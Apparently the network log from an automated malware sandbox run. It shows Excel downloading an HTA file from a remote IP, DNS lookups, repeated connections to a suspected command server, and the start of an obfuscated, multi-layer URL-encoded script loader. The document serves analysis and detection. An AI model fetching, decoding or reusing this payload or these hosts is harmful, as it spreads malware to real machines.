                                                                                    Oct 24, 2024 08:47:22.963869095 CEST804924194.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:22.966217995 CEST4924180192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:22.972650051 CEST804924194.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:22.972721100 CEST4924180192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:23.103919029 CEST4924280192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:23.110352039 CEST804924294.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:23.110433102 CEST4924280192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:23.112205982 CEST4924280192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:23.118962049 CEST804924294.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:23.119040012 CEST4924280192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:23.126368046 CEST804924294.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:24.081892967 CEST804924294.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:24.081988096 CEST4924280192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:24.087812901 CEST804924294.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:24.087929964 CEST4924280192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:24.234637976 CEST4924380192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:24.239995956 CEST804924394.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:24.240144014 CEST4924380192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:24.241831064 CEST4924380192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:24.247170925 CEST804924394.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:24.247330904 CEST4924380192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:24.252757072 CEST804924394.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:25.191000938 CEST804924394.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:25.191205978 CEST4924380192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:25.198523998 CEST804924394.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:25.198584080 CEST4924380192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:25.334981918 CEST4924480192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:25.340518951 CEST804924494.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:25.340581894 CEST4924480192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:25.342227936 CEST4924480192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:25.347721100 CEST804924494.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:25.347820044 CEST4924480192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:25.353399038 CEST804924494.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:26.304109097 CEST804924494.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:26.304249048 CEST4924480192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:26.310070038 CEST804924494.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:26.310218096 CEST4924480192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:26.442441940 CEST4924580192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:26.447758913 CEST804924594.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:26.447829008 CEST4924580192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:26.449470043 CEST4924580192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:26.454826117 CEST804924594.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:26.454873085 CEST4924580192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:26.460225105 CEST804924594.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:27.421446085 CEST804924594.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:27.421647072 CEST4924580192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:27.427376986 CEST804924594.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:27.427433014 CEST4924580192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:27.627173901 CEST4924680192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:27.632602930 CEST804924694.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:27.632669926 CEST4924680192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:27.634330988 CEST4924680192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:27.639668941 CEST804924694.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:27.639729023 CEST4924680192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:27.645028114 CEST804924694.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:28.598006010 CEST804924694.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:28.598213911 CEST4924680192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:28.606338978 CEST804924694.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:28.606447935 CEST4924680192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:28.728965044 CEST4924780192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:28.735745907 CEST804924794.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:28.735805035 CEST4924780192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:28.737452030 CEST4924780192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:28.744370937 CEST804924794.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:28.744434118 CEST4924780192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:28.751300097 CEST804924794.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:29.691955090 CEST804924794.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:29.692194939 CEST4924780192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:29.699203014 CEST804924794.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:29.699271917 CEST4924780192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:29.984224081 CEST4924880192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:29.989789009 CEST804924894.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:29.989871025 CEST4924880192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:29.991545916 CEST4924880192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:29.996871948 CEST804924894.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:29.996928930 CEST4924880192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:30.002223015 CEST804924894.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:30.943694115 CEST804924894.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:30.943850994 CEST4924880192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:30.950973034 CEST804924894.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:30.951041937 CEST4924880192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:31.140501976 CEST4924980192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:31.145920038 CEST804924994.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:31.145987034 CEST4924980192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:31.147773981 CEST4924980192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:31.153070927 CEST804924994.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:31.153127909 CEST4924980192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:31.158495903 CEST804924994.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:32.217112064 CEST804924994.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:32.217247963 CEST4924980192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:32.223423958 CEST804924994.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:32.223484039 CEST4924980192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:32.352447033 CEST4925080192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:32.357935905 CEST804925094.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:32.358006001 CEST4925080192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:32.359581947 CEST4925080192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:32.364857912 CEST804925094.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:32.364980936 CEST4925080192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:32.370265007 CEST804925094.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:33.316694975 CEST804925094.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:33.316782951 CEST4925080192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:33.322650909 CEST804925094.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:33.322704077 CEST4925080192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:33.512443066 CEST4925180192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:33.517935991 CEST804925194.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:33.517990112 CEST4925180192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:33.519674063 CEST4925180192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:33.527735949 CEST804925194.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:33.527793884 CEST4925180192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:33.533512115 CEST804925194.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:34.466624022 CEST804925194.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:34.466932058 CEST4925180192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:34.472517967 CEST804925194.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:34.472632885 CEST4925180192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:34.599725962 CEST4925280192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:34.605077028 CEST804925294.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:34.605139971 CEST4925280192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:34.607471943 CEST4925280192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:34.612827063 CEST804925294.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:34.612891912 CEST4925280192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:34.618197918 CEST804925294.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:36.171612978 CEST804925294.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:36.171720982 CEST4925280192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:36.171799898 CEST804925294.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:36.171829939 CEST804925294.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:36.171860933 CEST4925280192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:36.171874046 CEST4925280192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:36.172389030 CEST804925294.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:36.172446966 CEST4925280192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:36.184211969 CEST804925294.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:36.373609066 CEST4925380192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:36.379117012 CEST804925394.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:36.379210949 CEST4925380192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:36.380880117 CEST4925380192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:36.386235952 CEST804925394.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:36.386308908 CEST4925380192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:36.391743898 CEST804925394.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:37.350135088 CEST804925394.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:37.350269079 CEST4925380192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:37.356118917 CEST804925394.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:37.356229067 CEST4925380192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:37.486057043 CEST4925480192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:37.491564989 CEST804925494.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:37.491633892 CEST4925480192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:37.493232012 CEST4925480192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:37.498639107 CEST804925494.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:37.498723984 CEST4925480192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:37.506623030 CEST804925494.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:38.480947018 CEST804925494.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:38.481255054 CEST4925480192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:38.486943960 CEST804925494.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:38.487037897 CEST4925480192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:38.632397890 CEST4925580192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:38.637820959 CEST804925594.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:38.637906075 CEST4925580192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:38.639719963 CEST4925580192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:38.645015955 CEST804925594.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:38.645071983 CEST4925580192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:38.650415897 CEST804925594.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:39.590569973 CEST804925594.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:39.590691090 CEST4925580192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:39.597242117 CEST804925594.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:39.597300053 CEST4925580192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:39.726964951 CEST4925680192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:39.732492924 CEST804925694.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:39.732548952 CEST4925680192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:39.734195948 CEST4925680192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:39.740036011 CEST804925694.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:39.740084887 CEST4925680192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:39.745428085 CEST804925694.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:40.694453001 CEST804925694.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:40.694535017 CEST4925680192.168.2.2294.156.177.220
                                                                                    Oct 24, 2024 08:47:40.700210094 CEST804925694.156.177.220192.168.2.22
                                                                                    Oct 24, 2024 08:47:40.700272083 CEST4925680192.168.2.2294.156.177.220
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 24, 2024 08:45:22.435332060 CEST5456253192.168.2.228.8.8.8
                                                                                    Oct 24, 2024 08:45:22.443413973 CEST53545628.8.8.8192.168.2.22
                                                                                    Oct 24, 2024 08:45:25.198833942 CEST5291753192.168.2.228.8.8.8
                                                                                    Oct 24, 2024 08:45:25.220220089 CEST53529178.8.8.8192.168.2.22
                                                                                    Oct 24, 2024 08:45:39.850053072 CEST6275153192.168.2.228.8.8.8
                                                                                    Oct 24, 2024 08:45:39.879537106 CEST53627518.8.8.8192.168.2.22
                                                                                    Oct 24, 2024 08:45:41.528641939 CEST5789353192.168.2.228.8.8.8
                                                                                    Oct 24, 2024 08:45:41.544504881 CEST53578938.8.8.8192.168.2.22
                                                                                    Oct 24, 2024 08:45:44.406956911 CEST5482153192.168.2.228.8.8.8
                                                                                    Oct 24, 2024 08:45:44.414830923 CEST53548218.8.8.8192.168.2.22
                                                                                    Oct 24, 2024 08:45:44.417562962 CEST5482153192.168.2.228.8.8.8
                                                                                    Oct 24, 2024 08:45:44.425565958 CEST53548218.8.8.8192.168.2.22
                                                                                    Oct 24, 2024 08:45:59.794780970 CEST5471953192.168.2.228.8.8.8
                                                                                    Oct 24, 2024 08:45:59.803519964 CEST53547198.8.8.8192.168.2.22
                                                                                    Oct 24, 2024 08:46:01.556329012 CEST4988153192.168.2.228.8.8.8
                                                                                    Oct 24, 2024 08:46:01.572320938 CEST53498818.8.8.8192.168.2.22
                                                                                    Oct 24, 2024 08:46:01.576849937 CEST4988153192.168.2.228.8.8.8
                                                                                    Oct 24, 2024 08:46:01.585191965 CEST53498818.8.8.8192.168.2.22
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Oct 24, 2024 08:45:22.435332060 CEST192.168.2.228.8.8.80x84b7Standard query (0)mpa.liA (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:45:25.198833942 CEST192.168.2.228.8.8.80x24dStandard query (0)mpa.liA (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:45:39.850053072 CEST192.168.2.228.8.8.80x1e9fStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:45:41.528641939 CEST192.168.2.228.8.8.80x431cStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:45:44.406956911 CEST192.168.2.228.8.8.80x3a47Standard query (0)mpa.liA (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:45:44.417562962 CEST192.168.2.228.8.8.80x3a47Standard query (0)mpa.liA (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:45:59.794780970 CEST192.168.2.228.8.8.80x6fbStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:46:01.556329012 CEST192.168.2.228.8.8.80x3b7fStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:46:01.576849937 CEST192.168.2.228.8.8.80x3b7fStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Oct 24, 2024 08:45:22.443413973 CEST8.8.8.8192.168.2.220x84b7No error (0)mpa.li5.159.62.244A (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:45:22.443413973 CEST8.8.8.8192.168.2.220x84b7No error (0)mpa.li5.159.62.243A (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:45:25.220220089 CEST8.8.8.8192.168.2.220x24dNo error (0)mpa.li5.159.62.243A (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:45:25.220220089 CEST8.8.8.8192.168.2.220x24dNo error (0)mpa.li5.159.62.244A (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:45:39.879537106 CEST8.8.8.8192.168.2.220x1e9fNo error (0)drive.google.com216.58.212.174A (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:45:41.544504881 CEST8.8.8.8192.168.2.220x431cNo error (0)drive.usercontent.google.com142.250.186.97A (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:45:44.414830923 CEST8.8.8.8192.168.2.220x3a47No error (0)mpa.li5.159.62.243A (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:45:44.414830923 CEST8.8.8.8192.168.2.220x3a47No error (0)mpa.li5.159.62.244A (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:45:44.425565958 CEST8.8.8.8192.168.2.220x3a47No error (0)mpa.li5.159.62.243A (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:45:44.425565958 CEST8.8.8.8192.168.2.220x3a47No error (0)mpa.li5.159.62.244A (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:45:59.803519964 CEST8.8.8.8192.168.2.220x6fbNo error (0)drive.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:46:01.572320938 CEST8.8.8.8192.168.2.220x3b7fNo error (0)drive.usercontent.google.com142.250.186.97A (IP address)IN (0x0001)false
                                                                                    Oct 24, 2024 08:46:01.585191965 CEST8.8.8.8192.168.2.220x3b7fNo error (0)drive.usercontent.google.com142.250.186.97A (IP address)IN (0x0001)false
                                                                                    • mpa.li
                                                                                    • drive.google.com
                                                                                    • drive.usercontent.google.com
                                                                                    • 192.3.176.141
                                                                                    • 94.156.177.220
                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.2249164192.3.176.141803208C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:45:23.997997999 CEST375OUTGET /36/bv/seethebestthingstobegoodwithhislifebestthigns.hta HTTP/1.1
                                                                                    Accept: */*
                                                                                    UA-CPU: AMD64
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                    Host: 192.3.176.141
                                                                                    Connection: Keep-Alive
                                                                                    Oct 24, 2024 08:45:24.692682028 CEST1236INHTTP/1.1 200 OK
                                                                                    Date: Thu, 24 Oct 2024 06:45:23 GMT
                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                    Last-Modified: Thu, 24 Oct 2024 00:44:54 GMT
                                                                                    ETag: "20a04-6252e4f9e216e"
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 133636
                                                                                    Keep-Alive: timeout=5, max=100
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/hta
                                                                                    Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 4a 61 76 61 53 63 72 69 70 74 25 33 45 6d 25 33 44 25 32 37 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 68 74 6d 6c 25 32 35 [TRUNCATED]
                                                                                    Data Ascii: <script>...document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CscRiPT%252520TYpE%25253D%252522TexT/vBscrIpt%252522%25253E%25250ADiM%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                    Oct 24, 2024 08:45:24.692734003 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                    Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                    Oct 24, 2024 08:45:24.692785025 CEST424INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                                    Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                                    Oct 24, 2024 08:45:24.692820072 CEST1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 6a 74 4a 55 4e 52 64 48 58 64 64 47 6c 50 76 6e 47 59 63 6c 76 53 58 69 58 75 66 48 55 4d 51 72
                                                                                    Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509jtJUNRdHXddGlPvnGYclvSXiXufHUMQrzikApbWIejoDTAruyOIlXMSKIuKatFvfCVifgINdpnNRNPMuXTKiTHYQSlfiKgmwinDFzTdnuYFsgRgIUUlXALRWpAtbjyQMfSwVKRtHhZPcoPbEczlAggZxOVAAdQKvitRWbKnHqYtPzQaGkqNLZZYOffCAJquTg
                                                                                    Oct 24, 2024 08:45:24.692852974 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                                    Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                    Oct 24, 2024 08:45:24.692886114 CEST1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                    Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                    Oct 24, 2024 08:45:24.692922115 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                    Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
